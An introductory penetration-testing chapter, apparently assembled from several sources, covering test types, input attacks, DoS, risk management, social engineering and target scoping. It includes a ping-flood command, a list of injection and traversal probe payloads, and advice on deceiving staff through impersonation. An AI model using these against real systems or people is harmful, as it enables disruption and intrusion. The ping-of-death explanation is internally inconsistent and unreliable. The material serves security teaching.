
CHAPTER 1 Introduction to Penetration Testing

1.1 Introduction
1.2 Types of Penetration Testing
1.3 Penetration Testing Risks
1.4 Social Engineering
1.5 Rules of Engagement

Penetration Testing
Penetration tests are a great way to identify vulnerabilities that exist in a system or network that has existing security measures in place. A penetration test usually involves trusted individuals using the same attack methods as hostile intruders or hackers. Depending on the type of test conducted, this may involve a simple scan of IP addresses to identify machines offering services with known vulnerabilities, or it may go as far as exploiting known vulnerabilities in an unpatched operating system. The results of these tests or attacks are then documented and presented as a report to the owner of the system, and the vulnerabilities identified can then be resolved.

Bear in mind that a penetration test does not last forever. Depending on the organization conducting the tests, the time frame for each test varies. A penetration test is basically an attempt to breach the security of a network or system and is not a full security audit. This means it is no more than a view of a system's security at a single moment in time: the known vulnerabilities, weaknesses, or misconfigured systems it finds are those present within the time frame in which the test is conducted.

Penetration testing is often done for two reasons: to increase upper management's awareness of security issues, or to test intrusion detection and response capabilities. It also assists higher management in decision-making processes. The management of an organization might not want to address all the vulnerabilities found in a vulnerability assessment, but might want to address the system weaknesses found through a penetration test. This can happen because addressing all the weaknesses found in a vulnerability assessment can be costly, and most organizations might not be able to allocate the budget to do this.

Penetration tests can have serious consequences for the network on which they are run. If badly conducted, a test can cause congestion and system crashes. In the worst-case scenario, it can result in exactly the thing it is intended to prevent: the compromise of the systems by unauthorized intruders. It is therefore vital to have consent from the management of an organization before conducting a penetration test on its systems or network.

A penetration test, occasionally called a pentest, is a method of evaluating the security of a computer system or network by simulating an attack from malicious outsiders (who do not have an authorized means of accessing the organization's systems) and malicious insiders (who have some level of authorized access). The process involves an active analysis of the system for any potential vulnerabilities that could result from poor or improper system configuration, both known and unknown hardware or software flaws, and

operational weaknesses in process or technical countermeasures. This analysis is carried out from the position of a potential attacker and can involve active exploitation of security vulnerabilities. Security issues uncovered through the penetration test are presented to the system's owner. Effective penetration tests couple this information with an accurate assessment of the potential impacts to the organization and outline a range of technical and procedural countermeasures to reduce risks.

Web applications are widely used to provide functionality that allows companies to build and maintain relationships with their customers. The information stored by web applications is often confidential and, if obtained by malicious attackers, its exposure could result in substantial losses for both consumers and companies. Recognizing the rising cost of successful attacks, software engineers have worked to improve their processes to minimize the introduction of vulnerabilities. In spite of these improvements, vulnerabilities continue to occur because of the complexity of web applications and their deployment configurations. The continued prevalence of vulnerabilities has increased the importance of techniques that can identify vulnerabilities in deployed web applications. One such technique, penetration testing, identifies vulnerabilities in web applications by simulating attacks by a malicious user. Although penetration testing cannot guarantee that all vulnerabilities will be identified in an application, it is popular among developers for several reasons: (i) it generally has a low rate of false vulnerability reports, since it discovers vulnerabilities by exploiting them; (ii) it tests applications in context, which allows for the discovery of vulnerabilities that arise from the actual deployment environment of the web application; and (iii) it provides concrete inputs for each vulnerability report that can guide the developers in correcting the code.

Although individual penetration testers perform a wide variety of tasks, the general process can be divided into three phases: information gathering, attack generation, and response analysis. Figure 1 shows a high-level overview of these three phases. In the first phase, information gathering, penetration testers select a target web application and obtain information about it using various techniques, such as automated scanning, web crawling, and social engineering. The results of this phase allow penetration testers to perform the second phase, attack generation, which is the development of attacks on the target application. Often this phase can be automated by customizing well-known attacks or by using automated attack scripts. Once the attacks have been executed, penetration testers perform response analysis: they analyze the application's responses to determine whether the attacks were successful and prepare a final report about the discovered vulnerabilities.

During information gathering, the identification of an application's input vectors (IVs) is of particular importance. IVs are points in an application where an attack may be introduced, such as user-input fields and cookie fields. Better information about an application's IVs generally leads to more thorough penetration testing of the application. Currently, it is common for penetration testers to use automated web crawlers to identify the IVs of a web application. A web crawler visits the HTML pages generated by a web application and analyzes each page to identify potential IVs.
The main limitation of this approach is that it is incomplete: web crawlers are typically unable to visit all of the pages of a web application, or must provide specific values to the web application in order to cause additional HTML pages to be shown. Although penetration testers can make use of the information discovered by web crawlers, the incompleteness of such information means a potentially large number of vulnerable IVs may remain undiscovered. Another challenging aspect of penetration testing is determining whether an attack is successful. This task is complex because a successful attack often produces no observable behavior (i.e., it may produce a side effect that is not readily visible in the HTML page produced by the web application) and requires manual, time-consuming analysis to be identified. Existing approaches to automated response analysis tend to suffer from imprecision because they are based on simple heuristics.

Fig. 1: The three phases of penetration testing (information gathering, attack generation, and response analysis).
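To make the information-gathering phase concrete, the sketch below shows the kind of IV discovery a simple web crawler performs. It is a minimal illustration, not a production scanner: the target URL is hypothetical, it fetches a single page rather than crawling the whole site, and it assumes the requests and beautifulsoup4 libraries are installed and that you have written authorization to probe the target.

# Minimal sketch of input-vector (IV) discovery, assuming a hypothetical,
# in-scope target URL. Requires: pip install requests beautifulsoup4
import requests
from bs4 import BeautifulSoup
from urllib.parse import urljoin

TARGET = "http://testsite.example/"   # hypothetical, in-scope target

def find_input_vectors(url):
    """Fetch one page and list candidate IVs: form fields and cookies."""
    resp = requests.get(url, timeout=10)
    soup = BeautifulSoup(resp.text, "html.parser")
    ivs = []
    for form in soup.find_all("form"):
        # Resolve the form's submission endpoint relative to the page URL.
        action = urljoin(url, form.get("action") or url)
        for field in form.find_all(["input", "textarea", "select"]):
            name = field.get("name")
            if name:
                ivs.append((action, name))
    # Cookies set by the application are attacker-controllable IVs too.
    for cookie in resp.cookies:
        ivs.append((url, "cookie:" + cookie.name))
    return ivs

for action, name in find_input_vectors(TARGET):
    print(action, "->", name)

Run against a real in-scope application, each reported form field and cookie name becomes a candidate entry point for the attack-generation phase.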

Penetration tests are valuable for several reasons:


1. Determining the feasibility of a particular set of attack vectors.
2. Identifying higher-risk vulnerabilities that result from a combination of lower-risk vulnerabilities exploited in a particular sequence.
3. Identifying vulnerabilities that may be difficult or impossible to detect with automated network or application vulnerability scanning software.
4. Assessing the magnitude of potential business and operational impacts of successful attacks.
5. Testing the ability of network defenders to successfully detect and respond to the attacks.
6. Providing evidence to support increased investments in security personnel and technology.

Penetration tests can be conducted in several ways. The most common difference is the amount of knowledge of the implementation details of the system being tested that is available to the testers. Black box testing assumes no prior knowledge of the infrastructure to be tested; the testers must first determine the location and extent of the systems before commencing their analysis. At the other end of the spectrum, white box testing provides the testers with complete knowledge of the infrastructure to be tested, often including network diagrams, source code, and IP addressing information. There are also several variations in between, often known as grey box tests. Penetration tests can also be described as "full disclosure" (white box), "partial disclosure" (grey box), or "blind" (black box) tests based on the amount of information provided to the testing party.

The relative merits of these approaches are debated. Black box testing simulates an attack from someone who is unfamiliar with the system. White box testing simulates what might happen during an "inside job" or after a "leak" of sensitive information, where the attacker has access to source code, network layouts, and possibly even some passwords.

The services offered by penetration testing firms span a similar range, from a simple scan of an organization's IP address space for open ports and identification banners to a full audit of source code for an application. Penetration testing is one of the oldest methods for assessing the security of a computer system. The idea behind penetration testing methodologies is that the tester should follow a pre-scripted format during the test, as dictated by the methodology. A penetration testing methodology is proposed in this research. It is also important to consider a policy to be followed by both the tester and the client, to reduce financial and confidentiality disputes and to bring conformity to the operations between the two parties; this research therefore suggests a policy to be followed by penetration testers and their clients. Penetration testing is increasingly used by organizations to assure the security of information systems and services, so that security weaknesses can be fixed before they are exposed. But when a penetration test is performed without a well-planned, professional approach, it can result in exactly what it is supposed to prevent. In order to protect company data, companies often take measures to guarantee the availability, confidentiality, and integrity of data, or to ensure access for authorized persons only.

Why do we perform Penetration testing?


Hackers like to spend most of their time finding holes in computer systems, where bad coding is mostly to blame for creating vulnerabilities. Hackers then take this knowledge and apply it to real-world scenarios by attacking your network. They may be doing this as a grudge because they weren't hired by your company, or perhaps were fired at some stage, or they simply don't like your company, or just want the kudos of saying, "been there, done that!" To protect our computer systems from these hackers, we need to check for known vulnerabilities and exploits within our own systems. Vulnerabilities can comprise bugs, application back doors, and spyware that entered the code of the application, operating system, or firmware at development time, or files that were replaced at a later date in the form of viruses or Trojans. Over the past two years we've seen many hackers performing denial of service attacks against ISPs (1), banks (2), and even world governments (3). Carnegie Mellon's Software Engineering Institute, home of a Computer Emergency Response Team (CERT), and many other CERTs collate known and new vulnerabilities across all systems, platforms, and applications, and publish these to the security community and to the companies who created the systems, in the hope that people will become more aware of vulnerable systems and that the creators of these products will create and distribute patches. When a patch takes a while, in most cases a technical workaround is published to harden the systems that may be affected by the vulnerability.

Who should perform Penetration testing?


Most auditing companies now provide some level of penetration testing, either from within their company or subcontracted out to third-party security companies. If your company would like a penetration test performed on its current infrastructure, you can outsource to one of these companies. Many companies are now looking at creating their own internal security teams that provide constant day-to-day monitoring of networks and devices, and also spend valuable time researching the latest vulnerabilities from CERTs and collating the relevant security patches in-house, under advisement from the security community, to apply to company systems that are deemed vulnerable or compromised.

Unfortunately, even if you are patching systems you will always be one or two steps behind the hackers, and this is unavoidable; but it is much better than being 20 or 30 steps behind them by failing to identify and patch your systems and becoming vulnerable to attack, or even worse, allowing your networks to attack other companies' networks, which is now in the process of being made illegal in several countries. The UK government is already looking at making it part of UK law that you will be fined if you are found attacking other companies or systems on the Internet, unless you can provide proof that you are taking security seriously within your organization and applying all available patches regularly to try to stop future attacks from happening. The UK government is also trying to push more responsibility onto ISPs, so that ISPs should be looking out for attack vectors; if they find attacks coming from their customers or within their networks, they are at liberty to suspend infected services until the systems are made safe.

Penetration testing can be performed by anyone who is knowledgeable in this area and keeps up to date with the latest security news, penetration applications, and methods of attack, or who has extensive experience in penetration testing or is certified.

Outsourcing
Outsourcing penetration testing can be a very costly exercise, and one that you might want to perform only once a year. The problem with most networks is that they are constantly changing: people move equipment around the office or between office locations and install software on PCs and servers, so a penetration test only gives you a snapshot of compromised systems at that moment in time, as a guide. You also have to be extra vigilant when employing a security testing company. Make sure they have liability insurance. Do they come with certified security credentials? (4) Do they bait and switch? (5) Or do they employ real-life hackers who have their own agenda?

Why might we want a penetration test?


Most organizations will have a penetration test for one of the following reasons:

Some industries and types of data are regulated and must be handled securely (like the financial sector, or credit-card data). In this case your regulator will insist on a penetration test as part of a certification process.

You may be a product vendor (like a web developer), and your client may be regulated, so they will ask you to have a penetration test performed on their behalf.

You may suspect (or know) that you have already been hacked, and now want to find out more about the threats to your systems, so that you can reduce the risk of another successful attack.

You may simply think it is a good idea to be proactive, and find out about the threats to your organization in advance.

Advantages of Penetration Testing:

Business Advantages

1. Can be fast (and therefore cheap).
2. Requires a relatively lower skill set than source code review.
3. Tests the code that is actually being exposed.
4. Saves hundreds of thousands of dollars in remediation and notification costs by avoiding network downtime and/or averting a single breach.
5. Lowers the costs of security audits by providing comprehensive and detailed factual evidence of an enterprise's ability to detect and mitigate risks.
6. Creates a heightened awareness of security's importance at the CXO management level.
7. Provides unassailable information usable by audit teams gathering data for regulatory compliance.
8. Provides a strong basis for supporting approval of larger security budgets.
9. Provides support to evaluate the effectiveness of other security products, either deployed or under evaluation, to determine their ROI.

IT / Technical Benefits

1. Allows IT staff to quickly and accurately identify real and potential vulnerabilities without being overburdened with numerous false-positive indicators.
2. Allows IT staff to fine-tune and test configuration changes or patches to proactively eliminate identified risks.
3. Assists IT in prioritizing the application of patches for reported known vulnerabilities.
4. Enhances the effectiveness of an enterprise's security vulnerability management (SVM) program.

5. Provides vulnerability perspectives from both outside and within the enterprise.
6. Acts as a force multiplier for overall impact on IT resources and significantly enhances the knowledge and skill level of IT staff.

Disadvantages of Penetration Testing:


a. Too late in the SDLC.
b. Front-impact testing only.

1.2 DIFFERENT TYPES OF PENETRATION TESTING

Blackbox Testing
Blackbox security testing is more commonly referred to as ethical hacking. Blackbox testing primarily focuses on the externally facing components of an application or network: what a potential hacker might see from the Internet. In a blackbox testing scenario, analysts are typically provided with little or no information about the target environment. Usually only a target website's address (URL) or a range of Internet addresses (IP addresses) is provided, although in the case of website or application targets, login credentials may also be supplied. In this way, blackbox testing more accurately simulates a real-world attack by a malicious hacker possessing zero or limited knowledge of the target site or network. Just like a hacker, analysts scan the target environment searching for all exploitable attack vectors.

While blackbox testing is a relatively quick and affordable way to determine whether an Internet-facing application or network is susceptible to various forms of attack, it comes with certain limitations. A blackbox test constitutes the bare minimum level of security analysis. Blackbox testing won't identify every vulnerability that becomes exploitable once a hacker has breached the perimeter. Nor will a blackbox test yield an exhaustive list of the individual instances of each vulnerability that becomes exposed once a hacker has gained initial access to the target environment. Finally, blackbox testing is conducted for a limited duration, whereas true hackers have no such time restrictions, which is a significant difference given current Intrusion Prevention System (IPS) technologies. Therefore, the benefits and limitations of blackbox penetration testing need to be understood: this is not a

comprehensive test of website, application, or network security, but rather an initial assessment of that system's perimeter integrity.

Graybox Testing
Graybox penetration testing is also sometimes referred to as informed penetration testing or assisted blackbox testing. This method is similar to blackbox penetration testing, except that the analysts are given detailed information about the application or network, such as network architecture diagrams or access to the application source code. These details aid analysts in finding and verifying vulnerabilities they might have missed in a blackbox test. Graybox penetration testing provides a more thorough assessment of the target site or network's security, discovering vulnerabilities that are only visible once inside that environment, rather than just those facing the Internet. In a graybox application penetration test, the analyst tests the strength of the existing security controls as an insider, looking for vulnerabilities from the perspective of a trusted user with detailed knowledge of the environment. Upon successful login, the analyst sends malicious input to the application, manually or by using special tools, to determine how the application responds:
Does the application provide an entry point to other resources, servers, or databases?

Does the application provide useful information to take advantage of other attack vectors?

Does the application allow a user to perform an unauthorized escalation of their access?

Another value of graybox testing is that analysts are able to work directly with network and/or development teams to pinpoint the exact location of vulnerabilities: the actual lines in the source code, or the insecure network settings and configurations. Conversely, in a blackbox test the vulnerability could be demonstrated but its source might go unidentified. With a graybox test, a client company receives detailed information on the individual instances of vulnerabilities and their locations. With both blackbox and graybox testing, AsTech provides remediation recommendations and risk ratings based on the unique risk evaluation criteria most appropriate for each client.

An effective security program integrates multiple approaches, combining penetration testing with other types of assessment, such as application security code review, architecture review, and threat modeling. When performed in combination, these assessments provide a more comprehensive picture of the overall security posture of the target environment.

Environment Attacks
Software does not execute in isolation. It relies on any number of binaries and code-equivalent modules, such as scripts and plug-ins. It may also use configuration information from the registry or file system, as well as databases and services that may reside anywhere. Each of these environmental interactions may be the source of a security breach and therefore must be tested. There are also a number of important questions you must ask about the degree of trust that your application has in these interactions, including the following: How much does the application trust its local environment and remote resources? Does the application put sensitive information in a resource (for instance, the registry) that can be read by other applications? Does it trust every file or library it loads without verifying the contents? Can an attacker exploit this trust to force the application to do his bidding?

In addition to the trust questions, penetration testers should watch for DLLs that might be faulty or have been replaced (or modified) by an attacker, and for binaries or files with which the application interacts that are not fully protected by access control lists (ACLs) or are otherwise unprotected. Testers must also be on the lookout for other applications that access shared memory resources or store sensitive data in the registry or in temporary files. Finally, testers must consider factors that create system stress, such as a slow network or low memory, and determine the impact of these factors on security features.

Environment attacks are often conducted by rigging an insecure environment and then executing the application within that environment to see how it responds. This is an indirect form of testing: the attacks are waged against the environment in which the application is operating. Now let's look at direct testing.
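As one illustration of inspecting the environment, the following minimal sketch checks whether files an application loads are writable by other users, one of the ACL problems described above. The file paths are hypothetical placeholders; on a real engagement you would enumerate the binaries, libraries, and configuration files the target actually touches (for example with Process Monitor on Windows or strace/lsof on Unix).

# Minimal sketch of one environment check: are the libraries and config
# files an application trusts writable by other users? A group- or
# world-writable dependency lets an attacker replace code or data the
# application loads without verification. Paths below are hypothetical.
import os
import stat

SUSPECT_FILES = [
    "/opt/targetapp/bin/server",        # hypothetical application binary
    "/opt/targetapp/lib/libhelper.so",  # hypothetical dependency
    "/opt/targetapp/etc/app.conf",      # hypothetical configuration file
]

for path in SUSPECT_FILES:
    try:
        mode = os.stat(path).st_mode
    except FileNotFoundError:
        continue
    # Flag files that group members or any user on the system can modify.
    if mode & (stat.S_IWGRP | stat.S_IWOTH):
        print("[!]", path, "is group/world-writable:", stat.filemode(mode))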

Input Attacks
In penetration testing, the subsets of inputs that come from untrusted sources are the most important. These include communication paths such as network protocols and sockets, exposed remote functionality

such as DCOM, remote procedure calls (RPCs), and Web services; data files (binary or text); temporary files created during execution; and control files such as scripts and XML, all of which are subject to tampering. Finally, UI controls allowing direct user input, including logon screens, Web front ends, and the like, must also be checked. Specifically, we want to determine whether input is properly controlled: are good inputs allowed in and bad ones (such as long strings, malformed packets, and so forth) kept out? Suitable input checking and file parsing are critical.

You'll need to test to see whether dangerous input can be entered into UI controls, and find out what happens when it is. This includes special characters, encoded input, script fragments, format strings, escape sequences, and so forth. You'll need to determine whether long strings that are embedded in packet fields or in files and are capable of causing memory overflow will get through. Corrupt packets in protocol streams are also a concern. You must watch for crashes and hangs and check the stack for exploitable memory corruption. Finally, you must ensure that validation and error handling happen in the right place (on the server side, not only on the client side, since client-side checks can be bypassed) as a proper defense against bad input.

Input attacks really are like lobbing grenades at an application. Some of them will be properly parried and some will cause the software to explode. It's up to the penetration team to determine which are which and initiate appropriate fixes.
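The short sketch below illustrates this grenade-lobbing idea against a single, hypothetical form field: it posts a handful of classic hostile payloads and flags responses that suggest the input was not properly parried. It is a teaching sketch under the assumption of an authorized, in-scope target, not a substitute for a real fuzzer.

# Minimal input-attack sketch: send a few classic hostile payloads to one
# hypothetical form field and watch for crashes or error leakage.
# Requires: pip install requests
import requests

TARGET = "http://testsite.example/login"   # hypothetical, in-scope endpoint
PAYLOADS = [
    "A" * 10000,                  # long string: length/buffer handling
    "%s%s%s%s%n",                 # format string
    "<script>alert(1)</script>",  # script fragment (XSS probe)
    "' OR '1'='1",                # SQL metacharacters
    "../../../../etc/passwd",     # path traversal
]

for payload in PAYLOADS:
    try:
        resp = requests.post(TARGET, data={"username": payload}, timeout=10)
    except requests.RequestException as exc:
        print("[!] connection-level failure on", repr(payload[:20]), exc)
        continue
    # 5xx codes or stack traces in the body suggest the input got through.
    if resp.status_code >= 500 or "Exception" in resp.text:
        print("[!] suspicious response", resp.status_code,
              "for payload", repr(payload[:20]))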

Data and Logic Attacks


Some faults are embedded in an application's internal data storage mechanisms and algorithm logic. In such cases, there tend to be design and coding errors where the developer either assumed a benevolent user or failed to consider some code paths where a user might tread. Denial of service is the primary example of this category, but certainly not the most dangerous.

Denial of service attacks can be successful when developers have failed to plan for a large number of users (or connections, files, or whatever inputs cause some resource to be taxed to its limit). However, there are far more insidious logical defects that need to be tested. For example, information disclosure can happen when inputs that drive error messages and other generated outputs reveal exploitable information to an attacker. One practical example of such data that you should always remove is any hardcoded test accounts or test APIs (which are often included in internal builds to aid test automation). These can provide easy access to an attacker. Two more tests you should run are to input false credentials to determine whether the internal authorization mechanisms are robust, and to choose inputs that vary the code paths. Often one code path is secure, but the same functionality can be accessed in a different way that inadvertently bypasses some crucial check.
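A minimal sketch of those two tests appears below, against a purely hypothetical application: the endpoints and parameter names are assumptions, not a real product's API. The point is the pattern: false credentials must be rejected, and every alternate path to a protected function must enforce the same check.

# Sketch of the two logic tests described above, assuming a hypothetical,
# in-scope target. (1) False credentials must not yield a session.
# (2) The same functionality reached via a different code path must
# enforce the same authorization check.
import requests

BASE = "http://testsite.example"   # hypothetical, in-scope target

# Test 1: false credentials should be rejected with 401/403.
r = requests.post(BASE + "/login", data={"user": "nobody", "pass": "wrong"})
if r.status_code not in (401, 403):
    print("[!] false credentials were not cleanly rejected:", r.status_code)

# Test 2: the report is protected behind the UI, but is the direct
# download URL (a different code path) protected too? No session sent.
r = requests.get(BASE + "/reports/export?id=1")
if r.status_code == 200:
    print("[!] unauthenticated code path reaches protected functionality")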

Ping of death

Ping of death is another type of DoS attack that can shut down systems and cause great harm. The default ICMP echo packet carries 64 bytes of data, and many older systems could not handle incoming packets much larger than that. In a ping of death attack, an attacker generates ICMP echo packets of over 65,535 bytes, which exceeds the maximum legal IP packet size. A normal ping looks like this:

ping 192.168.1.1

Compare what happens with this:

ping 192.168.0.1 -l 65500 -n 10000

This, in effect, pings the target machine 192.168.0.1 ten thousand times with roughly 64 KB of data per packet.

Distributed DoS

A distributed denial of service (DDoS) attack is an attack in which an attacker uses several machines to launch a DoS attack, which is why it is difficult to handle. In a DDoS attack, multiple compromised systems that are already infected are used against the victim computer. In this case it is difficult to track the attacker, because the attack comes from several IP addresses and is therefore difficult to block.

Overall Defense
There is no single way to prevent DoS attacks because of their varying nature, but there are some effective ways to avoid them and reduce their effect:

Install and maintain anti-virus software.

Install a firewall, and configure it to restrict traffic coming into and leaving your computer.

Don't Be Deterred
Penetration testing is very different from traditional functional testing: not only do penetration testers lack appropriate documentation, but they also must be able to think like users who intend to do harm. This point is very important; developers often operate under the assumption that no reasonable user would execute a particular scenario, and therefore decline a bug fix. But you really can't take chances like that. Hackers will go to great lengths to find vulnerabilities, and no trick, cheat, or off-the-wall test case is out of bounds. The same must be true for penetration testers as well.

1.3 PENETRATION TESTING RISKS


The difference between a real attack and a penetration test is the penetration tester's intent, authority to conduct the test, and lack of malice. Because penetration testers may use the same tools and procedures as a real attacker, it should be obvious that penetration testing can have serious repercussions if it's not performed correctly. Even if the target company ceased all operations for the duration of the penetration test, there would still be a danger of data loss, corruption, or system crashes that might require a reinstall from bare metal. Few, if any, companies can afford to stop functioning while a penetration test is being performed. Therefore it is incumbent on both the target organization and the penetration test team to do everything in their power to prevent an interruption of normal business processes during penetration testing operations.

Risk is a measure of probability and severity of unwanted effects on software development projects.

The current strategies for evaluating or validating IT systems and network security are focused on examining the results of security assessments (including red-teaming exercises, penetration testing, vulnerability scanning, and other means of probing defenses for weaknesses in security), and on examining the building blocks, processes, and controls (for example: auditing business processes and procedures for security policy compliance, assessing the quality of security in infrastructure components, and reviewing system development and administration processes for security best practices).

Risk
Every organization has a mission. In this digital era, as organizations use automated information technology (IT) systems to process their information for better support of their missions, risk management plays a critical role in protecting an organization's information assets, and therefore its mission, from IT-related risk.

An effective risk management process is an important component of a successful IT security program. The principal goal of an organization's risk management process should be to protect the organization and its ability to perform its mission, not just its IT assets. Therefore, the risk management process should not be treated primarily as a technical function carried out by the IT experts who operate and manage the IT system, but as an essential management function of the organization. Risk is the net negative impact of the exercise of a vulnerability, considering both the probability and the impact of occurrence. Risk management is the process of identifying risk, assessing risk, and taking steps to reduce risk to an acceptable level. This guide provides a foundation for the development of an effective risk management program, containing both the definitions and the practical guidance necessary for assessing and mitigating risks identified within IT systems. The ultimate goal is to help organizations better manage IT-related mission risks.

The exposure of a risk can be quantified as

V(UE) = P(UE) * I(UE)    (1.a)

where UE stands for an unwanted event (risk factor), P(UE) is the probability that UE occurs, and I(UE) stands for the impact (or cost) due to the occurrence of UE. As an example, consider the following situation: UE = {Resignation of a senior analyst}, I(UE) = {6 months delay}, and P(UE) = 0.25; then V(UE) = 6 * 0.25 = 1.5 (months).
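The same arithmetic is trivial to script, which is useful when ranking many risk factors at once. The sketch below simply reproduces the worked example; the event list is illustrative.

# Small sketch of the risk-exposure formula V(UE) = P(UE) * I(UE),
# reproducing the senior-analyst example from the text.
def risk_exposure(probability, impact_months):
    """Expected loss: probability of the unwanted event times its impact."""
    return probability * impact_months

events = {
    # name: (P(UE), I(UE) in months) -- illustrative values
    "Resignation of a senior analyst": (0.25, 6.0),
}

for name, (p, i) in events.items():
    print(name + ": V(UE) =", i, "*", p, "=", risk_exposure(p, i), "months")
# -> Resignation of a senior analyst: V(UE) = 6.0 * 0.25 = 1.5 months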

Risk Management Process


RM is a continuous process that aims at applying suitable tools, procedures, and methodologies to prevent risk from occurring or to keep it within stated limits (SEI, 2002). Various studies describe the basic steps of RM in slightly different ways, but substantially they report a process which, similarly to the one that Figure 1 depicts, is based on the stages below.

Identify: Includes the identification of the internal and external sources of risk through a suitable
taxonomy (Higuera, 1996) (SEI, 2002), as depicted in Table 1. Risk Identification involves stakeholders and depends on the project context.

Analyze: Aims at understanding when, where, and why risk might occur, through direct queries to stakeholders about the probability and impact of risk elements. The prior probability is evaluated: this is the probability that an event (e.g., a project delay) could happen, assessed before the project starts and calculated from prior information.

Plan: In order to establish a strategy to avoid or mitigate the risk, decisions have to be made. In this stage, contingency plans are stated, as well as the related triggering thresholds. Risk-controlling actions are defined and selected.

Figure 1: Risk Management Process (stages: Identify, Analyze, Plan, Handle, Monitoring, Control, Document and Communicate).

Handle: The planned actions are carried out if the risk occurs.

Monitoring: This is a continuous activity that watches the status of the project and checks performance indicators (e.g., quality indicators such as the number of defects per size unit). In this stage, data concerning the risk trend is gathered.

Control: Appraises the corrections to be made to the risk mitigation plan in case of deviations. If the indicators show an increase over the fixed threshold, a contingency plan is triggered. In our opinion, this stage should deal with the posterior probability, because events have already occurred; that is, one tries to figure out whether an unwanted event actually had an impact on project objectives.

Document and Communicate: This stage can truly be considered the core of RM; in fact, all other stages refer to Documentation and Communication for enabling information exchange.

1.4 Social Engineering


Social engineers use their impersonation skills as a weapon: by dressing up like delivery men, security guards, or maintenance personnel, they are able to fool normal corporate security and make their way into secure areas, including server rooms, filing rooms, and more. In order to be an effective social engineer, one must first learn how to lie confidently. The psychology behind being a good liar is far beyond the scope of this article, but it is a necessity for becoming a good social engineer. Another trait of successful social engineers is extensive knowledge of the target technology. If you're posing as a delivery guy to get backstage at a Broadway musical, you may not really care who the "target" is; professional penetration testers and hackers, however, need to be intimately familiar with the hardware and software they are trying to access. Without perfect knowledge, no one will believe that you are supposed to be in there, fiddling with the hard drives on rack-mounted servers in the secure data center.

As a social engineer, you need to employ every possible means to fool your target into believing you are any of a plethora of roles, but make sure that you stay unrecognizable and do not let staff realize you are sticking around. This means coming at different times of the day and on different days of the week. Possible means for you to employ include impersonating an electrician, emailing tech support or the front desk with a plea for help, or calling the front desk or any other extension of the building while pretending to be someone else who needs urgent access to get a project finished for the "Big Boss." There are nearly infinite attack routes to take when employing social engineering alongside typical network security analysis.

Social engineering is the most effective way to gain access to any system, because humans are able to override any machine-directed security procedure that might be in place (unlocking the system for attackers). It is hard for corporations to protect against social engineering attacks, but an effort must be made to teach employees (new and old) to always ask for confirmation from multiple people before

allowing access to any systems or any restricted area to anyone at all. Reinforcing strict security practices such as these could one day mean a corporate America that is impervious to social engineering attacks... but that day is nowhere in sight, even in the distant future. When scoping social engineering, the following questions should be answered:

1. Will the client provide e-mail addresses of personnel that we can attempt to social engineer?
2. Will the client provide phone numbers of personnel that we can attempt to social engineer?
3. Will we be attempting to social engineer physical access?
4. If so, how many people will be targeted?

It should be noted that, as part of different levels of testing, the questions for business unit managers, systems administrators, and help desk personnel may not be required. However, feel free to use the following questions as a guide.

Specify IP Ranges and Domains


Before you start a penetration test, you must know what targets you will be attempting to penetrate. These targets should be obtained from the customer during the initial questionnaire phase. Targets can be given by the customer in the form of specific IP addresses, network ranges, or domain names. In some instances, the only target the customer gives you is the organization's name, and they expect you to figure out the rest for yourself. It is important to define whether systems like firewalls, IDS/IPS, or networking equipment that sit between the tester and the final target are also part of the scope.

Validate Ranges
It is imperative that before you start to attack the targets, you validate that they are in fact owned by the customer you are performing the test against. Think of the legal consequences you may run into if you start attacking a machine and successfully penetrate it, only to find out later that the machine actually belongs to another organization (such as a hospital or government agency). To verify that the targets actually belong to your customer, you can perform a whois lookup against them, either with a web-based whois tool such as Internic or with a tool on your computer, like the following:

user@unix:~$ whois example.com

Whois Server Version 2.0

Domain names in the .com and .net domains can now be registered
with many different competing registrars. Go to http://www.internic.net
for detailed information.

   Domain Name: example.COM
   Registrar: REGISTER.COM, INC.
   Whois Server: whois.register.com
   Referral URL: http://www.register.com
   Name Server: NS1.EXAMPLE.COM
   Name Server: NS3.EXAMPLE.COM
   Status: clientTransferProhibited
   Updated Date: 17-mar-2009
   Creation Date: 05-mar-2000
   Expiration Date: 05-mar-2016

Registrant:
   Domain Discreet
   ATTN: example.com
   Rua Dr. Brito Camara, n 20, 1
   Funchal, Madeira 9000-039 PT
   Phone: 1-902-7495331
   Email: 940fe48d0a16123306dddf8a5a4c2069@domaindiscreet.com

Registrar Name....: Register.com
Registrar Whois...: whois.register.com
Registrar Homepage: www.register.com

Domain Name: example.com
Created on..............: 2000-03-05
Expires on..............: 2016-03-05

Administrative Contact:
   Domain Discreet
   ATTN: example.com
   Rua Dr. Brito Camara, n 20, 1
   Funchal, Madeira 9000-039 PT
   Phone: 1-902-7495331
   Email: 940fe48a0a16123337ca6a1281067070@domaindiscreet.com

Technical Contact:
   Domain Discreet
   ATTN: example.com
   Rua Dr. Brito Camara, n 20, 1
   Funchal, Madeira 9000-039 PT
   Phone: 1-902-7495331
   Email: 940fe48d0a16123339c7eef67f34a73d@domaindiscreet.com

DNS Servers:
   ns1.example.com
   ns3.example.com
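When validating many targets, it can help to wrap the system whois client in a small script. The sketch below assumes a Unix-like host with the whois client installed; it only surfaces registrant-related lines for a human to verify, since whois output formats vary by registrar and are unreliable to parse automatically.

# Minimal sketch that wraps the system whois client to sanity-check
# target ownership before testing. Assumes a Unix-like host with the
# whois command available on PATH.
import subprocess

TARGETS = ["example.com"]   # the in-scope domains supplied by the customer

for domain in TARGETS:
    out = subprocess.run(["whois", domain], capture_output=True, text=True)
    print("===", domain, "===")
    # Surface only ownership-related lines for a human to review.
    for line in out.stdout.splitlines():
        if any(key in line for key in ("Registrant", "Registrar", "Name Server")):
            print(line.strip())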

Dealing with Third Parties


There are a number of situations where you will be asked to test a service or an application that is being hosted by a third party. This will become more and more prevalent as organizations make greater use of cloud services. The important thing to remember is that while you may have permission to test from your customer, you also need to receive permission from the third party. If you don't, at best you may anger the hosting party; at worst, you may run afoul of a number of international laws. Some enterprises may not even know that they are using cloud services, or may have forgotten that something is hosted elsewhere. Be prepared to break the news to them when you test, or put a clause in the SOW that covers undisclosed usage of third-party resources.

Cloud Services
The single biggest issue with testing cloud services is that data from multiple different organizations is stored on one physical medium, and often the security between these different data domains is very lax. The cloud service provider needs to be alerted to the testing, needs to acknowledge that the test is occurring, and must grant the testing organization permission to test. Further, there needs to be a direct security contact within the cloud service provider who can be contacted in the event that a security vulnerability is discovered that could impact the other cloud customers. Some cloud providers have specific procedures for penetration testers to follow, and may require request forms, scheduling, or explicit permission from them before testing can begin. This may seem like an onerous amount of approval for testing; however, the risks to the tester are too great otherwise.

ISP
